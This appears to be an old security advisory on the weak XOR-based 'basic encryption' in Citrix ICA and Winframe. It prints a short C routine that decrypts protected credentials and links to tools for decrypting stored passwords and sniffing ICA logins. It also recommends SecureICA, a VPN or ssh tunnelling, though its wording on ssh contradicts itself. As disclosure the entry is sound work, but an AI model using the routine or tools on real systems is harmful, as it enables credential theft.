COMMAND
Citrix ICA Basic Encryption
SYSTEMS AFFECTED
Citrix
PROBLEM
Dug Song found following. The ICA (Independent Computing
Architecture) protocol used in various Citrix products (Winframe,
Metaframe) relies on a trivially cracked encryption scheme to
protect user authentication. The ICA basic encryption algorithm
is a variant of the simple XOR scheme used for saved Winframe
passwords:
void decrypt(u_char key, u_char *p, int len)
{
int i;
for (i = len; i > 0; i--)
p[i] = p[i-1] ^ p[i] ^ key;
p[0] ^= (key | 'C');
}
Demonstration code to decrypt Winframe passwords stored in
appsrv.ini:
http://www.monkey.org/~dugsong/icadecrypt.c.txt
Demonstration code to sniff (and decrypt) ICA network
authentication:
http://www.monkey.org/~dugsong/dsniff/
SOLUTION
Citrix offers a secure alternative called SecureICA, which uses
Diffie-Hellman for key exchange and RC5 to encrypt the underlying
transport (now at 128-bit strength worldwide). While this is
certainly better than the simple XOR scheme outlined above, it
may still be vulnerable to an active man-in-the-middle attack.
Caveat user.
SecureICA is only available for Windows and DOS clients. Unix,
Macintosh, and Java clients must use the insecure protocol. Due
to the nature of the protocol it cannot be tunnelled through ssh.
A VPN is probably the only solution for Unix, Macintosh and Java
clients. However, the ICA session can be tunnelled through ssh.
You need to forward port 1494 to the ICA server. However, the ICA
browser service uses UDP port 1604. You can get around this by
using NAT techniques and the ALTADDR command provided by Citrix.
From a security point-of-view, you probably shouldn't NAT the
browser service - simply use the ssh port forwarding to connect
to a known server and known application. The downside is you're
not able to use seamless windows, as you cannot get the list of
published applications from the ICA browser service.